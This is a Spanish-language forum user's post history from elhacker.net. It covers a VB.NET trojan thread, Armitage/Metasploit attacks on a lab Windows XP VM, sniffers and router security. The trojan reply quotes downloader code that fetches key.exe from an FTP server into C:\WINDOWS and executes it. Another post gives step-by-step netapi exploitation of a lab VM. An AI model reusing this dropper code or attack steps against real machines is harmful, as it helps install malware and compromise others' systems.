elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: [1] 2
1  Programación / .NET (C#, VB.NET, ASP) / Re: Troyano en VB.NET (indectectable) en: 4 Septiembre 2011, 22:37 pm
Un trabajo muy currado.
Pero me parece que en vez de finalizar los IF puedes usar los ELSE ya que creo que es lo mismo IF NOT que ELSE.
Código:
If Not My.Computer.FileSystem.FileExists("C:\WINDOWS\keg.exe") Then
            My.Computer.Network.DownloadFile("ftp://servidor/key.exe", "C:\WINDOWS\keg.exe", "user", "passw")
        End If

Lo que digo es esto:
Código:
       If My.Computer.FileSystem.FileExists("C:\WINDOWS\keg.exe") And My.Computer.FileSystem.FileExists("C:\WINDOWS\ord.exe") Then
            Shell("C:\WINDOWS\keg.exe")
            Shell("C:\WINDOWS\ord.exe")
      
      ELSE My.Computer.FileSystem.FileExists("C:\WINDOWS\keg.exe") Then
            My.Computer.Network.DownloadFile("ftp://servidor/key.exe", "C:\WINDOWS\keg.exe", "user", "passw")
        End If


Conste que mi conocimiento básico y estoy aún haciendo mis pinitos. Así que posiblemente me equivoque, ya que me parece no puedes poner dos veces un ELSE en la instruccion IF y me este equivocando yo.
Ahora tambien pensando se me ha ocurrido también la funcion ElseIf.


Saludos  ;)
2  Seguridad Informática / Hacking / Re: [Armitage] Administrador Gráfico de Cyber Ataques para Metasploit en: 16 Agosto 2011, 22:23 pm
No creo, ten en cuenta que en youtube los videotutoriales se ven como cambian de pestaña rapido. Y si se tiene todo bien configurado en las opciones de red no tiene porque haber un problema. Lástima que mi portatil(mi conejo de indias)  haber si lo formateo y demás y hago una prueba. Pero me da un palo terrible  :xD
Yo de momento con la ISO limpia no me detecta nada, y con la desatendida si que me lo detecta el armitage. Que cosas me pasan.


EDIT: Vale, he conseguido por fin(aún que no me alegro demasiado...) de corromper el windows xp con el netapi. Al final he tenido que desactivar el firewall, porque no me dejaba hacerle ping y por eso no me lo detectaba, lo he hecho con el Windows Xp CloneCD sin modificar. Ahora voy a probar sus funcionalidades.
Mira ruben, yo lo he hecho de esta forma:
1- Inicio backtrack -> Buscamos el Armitage en el menú de Framework.
2- Seleciono la base de datos MySQL y le doy a Start mfs
3- Desactivar Firewall de windows xp
4- Hosts-> Nmap scan -> nmap scann + Intense Scan all ports TCP
5- (Si no nos detecta el armitage el pc de la victima/maquina virtual hacemos este paso, sino saltarlo)Probar haciendo ping desde backtrack a la ip del WinXp y ver que responde.
6- Añadir ip de la maquina virtual que hace de conejillo de indias. (en mi caso 192.168.1.41)
7- Buscar ataques por puerto y ya todo lo demás debe funcionar.

Ya dirás haber si funciona
3  Seguridad Informática / Hacking / Re: [Armitage] Administrador Gráfico de Cyber Ataques para Metasploit en: 16 Agosto 2011, 20:00 pm
Pues no lo entiendo. Con la de tiempo que tiene este sistema operativo(XP), y que haya tan pocas vulnerabilidades para el Xp, aún así yo creo que será por los puertos.
Pero bueno, yo ya me había descargado una Iso limpia por si era el fallo ese, pero no. Aún así iré probando ahora con windows 7 haber si se consigue algo.

Gracias por tu respuesta ruben ;)
4  Seguridad Informática / Hacking / Re: [Armitage] Administrador Gráfico de Cyber Ataques para Metasploit en: 16 Agosto 2011, 02:28 am
Post modificado porque sin querer he hecho doble post.
5  Seguridad Informática / Hacking / Re: [Armitage] Administrador Gráfico de Cyber Ataques para Metasploit en: 16 Agosto 2011, 02:09 am
Estarán apagados, desconectado de la red, etc o.o

Abrí un nuevo tema, conta exactamente lo que haces, lo que pasa, y pone la salida del scan del NMap

Saludos...
Hola Mauro, mira, si me pudieras echar una mano te lo agradecería.

Tengo dos maquinas virtuales con vmware, con backtrack 5 y windows xp, el Windows Xp es una versión light, y la cual yo creo que es por eso que falla.
Bueno, le explico:
En las opciones de red de las dos maquinas virtuales(Configuracion vmware de red), marco la casilla de Bridge para que hagan un puente y así poderse comunicarse como una LAN. Cuando hago el escaneo a la ip del WIn Xp (ej: 192.168.1.38) me sale la pantalla conforme que lo ha encontrado, lo seleciono, le doy a Attacks-> Find Attacks -> Port ( ya que escaneo también los puertos abiertos) y cuando encuentra las vuln. pues elijo por ejempo la del 'netapi' y verifico que están bien las IP's y cuando le doy a enviar no hace nada.
Porque si no se comunicaran ya en un principio ya no vería el monitor, ni tampoco podría de hacer un MITM con resultados exitosos.

¿Que es lo que estoy haciendo mal o que paso me he dejado por el camino?


un saludo


EDIT: Shit, quería editar este post y sin querer cité y lo edité y hice doble post.
Haber si un moderador que se pase por aquí me lo puede eliminar  por favor.
6  Seguridad Informática / Hacking / Re: Cain & Abel para Windows 7? en: 15 Agosto 2011, 19:04 pm
Recordad que en Windows Xp no hay ningún problema en lo de "Corrupt installation detected" ya que tiene por defecto los permisos de administrator.
Pero en Win Vista y Win 7 necesitas ejecutar el instalador y el programa/(después de haberlo instalado) con click derecho y "Ejecutar como administrador".

PD: Yo no me fio de descargar un programa que no sea de la pagina oficial. La mayoría de veces contienen troyanos, keyloggers etc.
7  Seguridad Informática / Hacking Wireless / Re: ¿Me pueden decir si han hackeado mi router aqui dejo una imagen y el log? en: 15 Agosto 2011, 02:00 am
Sino me equivoco, ya han entrado en tu red wifi. Eso si, el que lo ha logrado es un poco burro, porque ahí hay 27 peticiones fallidas con el mismo usuario y contraseña. Hasta que buscó en google y encontró la respuesta.  :xD

Haz un filtrado MAC si solo tienes un pc o 2. Te ahorrarás un 70% de dolor de cabeza. Y cambia la clave de la red wifi por una WPA2, y se acabó.
8  Seguridad Informática / Hacking / Re: Dejar instalado un sniffer en: 13 Agosto 2011, 23:35 pm
Para saber donde navegas tienes Wireshark, Ettercap y muchos mas, pero estos son los mas usados. El inconveniente es que no envia ningún correo. Pero podrías probar una conexión remota al estilo TeamViewer.

Yo hace poco me he pasado al pinguino, y dedicar mas tiempos y conocimiento en linux. Ya que en Windows y todas sus ramas de redes, programación, hacking etc lo tengo muy aprendido. Y de ahí te podría decir muchas soluciones, pero como ves en linux estoy un poco bastante perdido y mas o menos te he dicho cosas que podrías llevar a cabo sin problemas. Sino me equivoco linux tiene para acceso remoto, o probar con un tunneling https para el acceso remoto.

Bueno, espero no haberle liado demasiado y haberme explicado bien. Como te he dicho, soy nuevo en linux y el conocimiento que tengo para lo que pides en el OS linux es escaso, pero Und3r seguro que te responderá con certeza.
9  Media / Juegos y Consolas / Re: Crear server WoW | Arcemu | 3.0.9 en: 25 Febrero 2009, 22:35 pm
no sise pero cuanto tendria que pagar ??es para el juego
Hombre.. baratos no son.. pero por lo que veo es para alojar el servidor no?
Para 100 o 80 personas( nolose muy bien) pues depende que empresa cojas te saldra mas caro o mas barato.. consta que la primera factura te saldra mas caro por el alta y la instalacion.. pero las demas a su precio.
Pero por 60 euros cada mes seguro que encuentras alguno.
10  Media / Juegos y Consolas / Re: Crear server WoW | Arcemu | 3.0.9 en: 25 Febrero 2009, 17:16 pm
mmm si pero ai host para server wow ? esque e visto en varias partes como acer servidores pero nunca e visto un host 24/7
Tu que te refieres Host para alojar el servidor o la pagina?
Si es para paginas tienes miles gratuitos.
SI es para alojar el servidor me parece.. que tendras que pagar :silbar:
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines